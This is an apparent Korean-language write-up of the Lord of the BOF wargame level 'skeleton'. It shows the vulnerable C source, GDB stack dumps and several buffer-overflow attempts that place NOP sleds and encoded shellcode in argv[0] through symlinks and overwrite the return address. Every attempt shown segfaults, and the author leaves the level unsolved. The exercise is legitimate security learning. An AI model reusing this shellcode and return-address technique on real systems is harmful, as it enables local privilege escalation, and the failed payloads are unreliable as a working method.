--------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level10 [ Vampire -> Skeleton ]
--------------------------------------------------------------------------------------------------------------------------
[vampire@localhost vampire]$ ls
skeleton skeleton.c
[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Entry point of the LOB "skeleton" target.  Copies argv[1] into a fixed
 * 40-byte stack buffer, echoes it, then wipes the environment strings,
 * the buffer and every argv string before returning.
 *
 * Review notes on what the visible code allows:
 *  - The length check only rejects argv[1] longer than 48 bytes, so the
 *    strcpy() below can write up to 48 bytes plus the terminator into a
 *    40-byte buffer.  This is the overflow the level is built around; a
 *    real program would bound the copy to sizeof buffer.
 *  - argv[1][47] is read *before* the length check, so an argument
 *    shorter than 48 bytes makes that read go past the string's end.
 *  - memset/strlen/strcpy are used without <string.h>, and main has no
 *    return type and no return statement (pre-C99 implicit declarations).
 */
main(int argc, char *argv[])
{
char buffer[40]; // 40 bytes, but up to 49 may be copied in below
int i, saved_argc; // saved_argc: argc is stashed here before the argv strings are wiped
if(argc < 2){
printf("argv error\n"); // at least one argument is required
exit(0);
}
// egghunter: zero every environment string (its characters only; the terminating NULs stay)
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf') // meant to block return-to-libc: byte 47 must be 0xbf (checked before the length test)
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){ // reject more than 48 bytes -- still 8 more than buffer holds
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc; // keep a copy of argc for the final wipe loop
strcpy(buffer, argv[1]); // unbounded copy into the 40-byte buffer
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40); // clear the local buffer
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i])); // wipe every argv string, argv[0] included
}
인자를 모두 초기화하는, 진짜 말 그대로 더러운 놈입니다.
어떻게 공격을 해야 할까요... 보면 Argv[0]은 프로그램이 실행될 때 그 찌꺼기가 스택의 꼭대기에 남는
특이한 성질이 있습니다. 그러니까 트롤 문제처럼 Argv[0]에 NOP와 쉘코드를 넣어 주고, 소스로 찾는 것이 아니라
직접 GDB로 분석해서 꼭대기로 리턴시켜 주어야 합니다.
꼭대기에 어떤 찌꺼기가 있는지 확인해보도록 하겠습니다.
[vampire@localhost xodnr]$ ./skeleton aa
stack is still your friend.
[vampire@localhost xodnr]$ ulimit -c unlimited
[vampire@localhost xodnr]$ ./skeleton `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ gdb -q skeleton core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...ddone.
Reading symbols from /lib/ld-linux.so.2...idone.
#0 0xbfbfbfbf in ?? ()
(gdb) x/50x $esp
0xbffffb30: 0x00000000 0xbffffb74 0xbffffb80 0x40013868
0xbffffb40: 0x00000002 0x08048450 0x00000000 0x08048471
0xbffffb50: 0x08048500 0x00000002 0xbffffb74 0x08048390
0xbffffb60: 0x080486ac 0x4000ae60 0xbffffb6c 0x40013e90
0xbffffb70: 0x00000002 0xbffffc66 0xbffffc71 0x00000000
0xbffffb80: 0xbffffca2 0xbffffcc4 0xbffffcce 0xbffffcdc
0xbffffb90: 0xbffffcfb 0xbffffd0b 0xbffffd24 0xbffffd41
0xbffffba0: 0xbffffd4c 0xbffffd5a 0xbffffd9d 0xbffffdb0
0xbffffbb0: 0xbffffdc5 0xbffffdd5 0xbffffde2 0xbffffe01
0xbffffbc0: 0xbffffe0c 0xbffffe19 0xbffffe21 0xbfffffe4
0xbffffbd0: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbe0: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbf0: 0x00001000 0x00000007
(gdb)
0xbffffbf8: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffc08: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffc18: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
0xbffffc28: 0x000001fd 0x00000010 0x0fe9fbff 0x0000000f
0xbffffc38: 0xbffffc61 0x00000000 0x00000000 0x00000000
0xbffffc48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc58: 0x00000000 0x00000000 0x38366900 0x00000036
0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb8: 0x00000000 0x00000000
(gdb)
0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd80: 0x00000000 0x00000000
(gdb)
0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe48: 0x00000000 0x00000000
(gdb)
0xbffffe50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff10: 0x00000000 0x00000000
(gdb)
0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd8: 0x00000000 0x00000000
(gdb)
0xbfffffe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffff0: 0x732f2e00 0x656c656b 0x006e6f74 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
끝 부분에 약간의 찌꺼기가 남아 있는데, 그 부분이 파일명, 즉 Argv[0] 부분이라고 합니다.
정확히 왜 그런 건지는 잘 모르겠습니다. 아무튼 Argv[0]을 이용해 공략하면 되는 것이고, 저번 페이로드처럼
공격하겠습니다.
[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost xodnr]$ ll
total 84
-rw------- 1 vampire vampire 61440 Aug 27 21:13 core
-rwxrwxr-x 1 vampire vampire 12752 Aug 27 21:10 skeleton
-rw-r--r-- 1 vampire vampire 821 Aug 27 21:10 skeleton.c
lrwxrwxrwx 1 vampire vampire 8 Aug 27 21:21 ????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î? -> skeleton
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xfe\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿þÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xf0\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ðÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'`
[vampire@localhost xodnr]$ ./`python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'` `python -c 'print "\x90"*44 + "\x26\xfc\xff\xbf"'`
&üÿ¿
Segmentation fault (core dumped)
그런데 계속 시도해도 쉘이 뜨지 않아서 코어를 확인해 보았더니, 쉘코드는 정상적으로 들어가 있습니다.
(gdb)
0xbfffff68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc8: 0xeb909090 0xc9315e11 0x6c8032b1 0x8001ff0e
0xbfffffd8: 0xf67501e9 0xeae805eb 0x32ffffff 0x306951c1
0xbfffffe8: 0x69697430 0x6f6a6330 0x5451e48a 0xb19ae28a
0xbffffff8: 0x0081ce0c 0x00000000 Cannot access memory at address 0xc0000000
그래서 위의 주소로 리턴시켜 줘도 쉘이 뜨지 않길래 짧은 쉘코드를 한번 써 보았는데, 그래도 쉘이 뜨지 않았습니다. ㅠ;
이상하게 쉘이 뜨지 않습니다. 나중에 꼭 다시 풀어 보도록 하겠습니다.